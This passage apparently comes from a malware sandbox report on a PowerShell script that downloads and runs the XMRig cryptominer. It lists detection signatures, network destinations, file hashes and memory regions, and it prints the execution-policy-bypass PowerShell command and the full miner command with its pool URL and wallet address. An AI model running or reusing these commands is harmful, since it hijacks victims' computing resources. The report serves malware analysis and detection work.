memory/4504-58-0x000001C13AE10000-0x000001C13AE30000-memory.dmp
memory/4504-59-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-60-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-61-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-62-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-63-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-64-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-65-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-66-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-67-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-68-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-69-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-70-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-71-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-72-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-73-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-74-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-75-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-76-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-77-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-78-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-79-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-80-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-81-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-82-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-83-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-84-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-85-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-86-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-87-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-88-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-89-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-90-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-91-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-92-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-93-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-94-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-95-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-96-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-97-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-98-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-99-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-100-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-101-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-102-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-103-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-104-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-105-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-106-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-107-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-108-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-109-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-110-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-111-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-112-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-113-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-114-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-115-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-116-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
memory/4504-117-0x00007FF6B0AC0000-0x00007FF6B16F3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1741s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 484 wrote to memory of 2136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 484 wrote to memory of 2136 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/484-0-0x00007FFC49A13000-0x00007FFC49A15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vmwvoasz.kd3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/484-6-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-10-0x0000020FF2320000-0x0000020FF2342000-memory.dmp
memory/484-11-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-12-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/484-14-0x0000020FF2700000-0x0000020FF2712000-memory.dmp
memory/484-15-0x0000020FF26E0000-0x0000020FF26EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2136-46-0x0000011850FE0000-0x0000011851000000-memory.dmp
memory/2136-47-0x0000011851030000-0x0000011851050000-memory.dmp
memory/484-49-0x00007FFC49A13000-0x00007FFC49A15000-memory.dmp
memory/2136-48-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/484-50-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/2136-53-0x0000011851060000-0x0000011851080000-memory.dmp
memory/2136-52-0x0000011851080000-0x00000118510A0000-memory.dmp
memory/484-51-0x00007FFC49A10000-0x00007FFC4A4D2000-memory.dmp
memory/2136-54-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-55-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-56-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-58-0x0000011851060000-0x0000011851080000-memory.dmp
memory/2136-57-0x0000011851080000-0x00000118510A0000-memory.dmp
memory/2136-59-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-60-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-61-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-62-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-63-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-64-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-65-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-66-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-67-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-68-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-69-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-70-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-71-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-72-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-73-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-74-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-75-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-76-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-77-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-78-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-79-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-80-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-81-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-82-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-83-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-84-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-85-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-86-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-87-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-88-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-89-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-90-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-91-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-92-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-93-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-94-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-95-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-96-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-97-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-98-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-99-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-100-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-101-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-102-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-103-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-104-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-105-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-106-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-107-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-108-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-109-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-110-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-111-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-112-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-113-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-114-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-115-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-116-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
memory/2136-117-0x00007FF79D6F0000-0x00007FF79E323000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3508 wrote to memory of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3508 wrote to memory of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp
memory/3508-5-0x00000281DC120000-0x00000281DC142000-memory.dmp
memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-9-0x00000281DC320000-0x00000281DC396000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_skkzxqpa.gvk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/3508-48-0x00000281DC2E0000-0x00000281DC2F2000-memory.dmp
memory/3508-61-0x00000281DC170000-0x00000281DC17A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2576-90-0x000001DE255E0000-0x000001DE25600000-memory.dmp
memory/3508-91-0x00007FF992773000-0x00007FF992774000-memory.dmp
memory/3508-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp
memory/2576-92-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-94-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-95-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-96-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-97-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-98-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-99-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-100-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-101-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-102-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-103-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-104-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-105-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-106-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-107-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-108-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-109-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-110-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-111-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-112-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-113-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-114-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-115-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-116-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-117-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-118-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-119-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-120-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-121-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-122-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-123-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-124-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-125-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-126-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-127-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-128-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-129-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-130-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-131-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-132-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-133-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-134-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-135-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-136-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-137-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-138-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-139-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-140-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-141-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-142-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-143-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-144-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-145-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-146-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-147-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-148-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-149-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-150-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-151-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
memory/2576-152-0x00007FF63D930000-0x00007FF63E563000-memory.dmp
